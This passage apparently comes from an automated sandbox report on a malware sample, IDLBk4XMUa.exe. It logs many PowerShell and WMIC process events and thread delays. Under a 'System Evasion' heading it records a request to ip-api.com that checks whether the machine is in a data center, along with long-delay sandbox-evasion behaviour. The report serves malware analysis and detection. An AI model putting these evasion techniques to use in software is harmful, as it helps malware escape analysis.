                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeMemory allocated: 200963D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeMemory allocated: 200AFF70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597422Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597286Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597171Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597062Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596948Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596841Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596706Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596567Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596453Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596343Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596234Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596124Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596015Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595906Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595792Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595687Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595578Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595468Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595359Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595250Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595140Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595031Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594921Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594812Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594703Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594593Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594482Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594375Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594265Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594156Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594046Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593932Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593828Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593718Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593605Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593491Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593390Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593281Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593171Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593062Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592953Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592843Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592734Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592624Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592515Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592406Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592296Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
